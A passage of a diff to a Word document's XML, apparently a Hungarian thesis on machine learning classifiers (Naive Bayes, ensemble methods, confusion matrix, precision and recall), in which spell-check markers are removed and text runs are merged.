+        <w:t>Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv Bayes-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14345,33 +12925,11 @@
         </w:rPr>
         <w:t xml:space="preserve">s ábra: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tétele</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive Bayes tétele</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14397,45 +12955,65 @@
         </w:rPr>
         <w:t xml:space="preserve">Háromféle </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bayes osztályozó létezik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> osztályozó létezik</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>normál</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Gauss-)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> eloszlás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> alapján történő osztályozáshoz a Gauss</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ian</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14447,65 +13025,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>normál</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Gauss-)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> eloszlás</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> alapján történő osztályozáshoz a Gauss</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ian</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használják</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bayes-t használják</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14519,33 +13045,17 @@
         </w:rPr>
         <w:t xml:space="preserve">kkor </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tétel</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Naive </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes tétel</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14806,28 +13316,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ensemble</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Methods</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ensemble Methods</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14998,21 +13492,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hiperparaméter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
+        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15067,7 +13547,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="20" w:name="_Toc71471976"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15077,9 +13556,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Confusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Confusion </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15089,9 +13567,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>M</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15101,21 +13578,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>atrix</w:t>
       </w:r>
       <w:bookmarkEnd w:id="20"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15193,7 +13658,6 @@
         </w:rPr>
         <w:t xml:space="preserve">2.3.1-es ábra: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15204,16 +13668,8 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">onfusion </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15230,14 +13686,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">trix </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15273,7 +13722,6 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15286,14 +13734,12 @@
         </w:rPr>
         <w:t>onfusion</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15304,14 +13750,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
+        <w:t>trix olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15376,33 +13815,11 @@
         </w:rPr>
         <w:t>igaz pozitív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">true positive, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15437,33 +13854,11 @@
         </w:rPr>
         <w:t>igaz negatív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>negative</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">true negative, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15522,33 +13917,11 @@
         </w:rPr>
         <w:t>hamis pozitív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>false</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">false positive, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15607,33 +13980,11 @@
         </w:rPr>
         <w:t>hamis negatív (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>false</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>negative</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">false negative, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15697,7 +14048,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -15706,7 +14056,6 @@
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15730,14 +14079,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15754,47 +14101,31 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">(true positive) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> összes</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és az</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> összes</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jósolt pozitív</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15806,67 +14137,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>jósolt pozitív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>megfigyelések</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>total</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>predicted</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (total predicted positive)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15923,14 +14200,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16038,7 +14313,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -16047,7 +14321,6 @@
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16071,14 +14344,12 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -16107,35 +14378,31 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>true</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> (true positive)</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z összes tényleges pozitív</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16147,19 +14414,79 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>és</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z összes tényleges pozitív</w:t>
+        <w:t xml:space="preserve">megfigyelések </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(total </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>actual</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> positive)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, tehát a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>helyesen megjósolt pozitív</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negatív</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> megfigyelésé</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> összegének</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aránya</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16171,130 +14498,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">megfigyelések </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>total</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>actual</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>positive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, tehát a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>helyesen megjósolt pozitív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>negatív</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> megfigyelésé</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> összegének</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> aránya</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
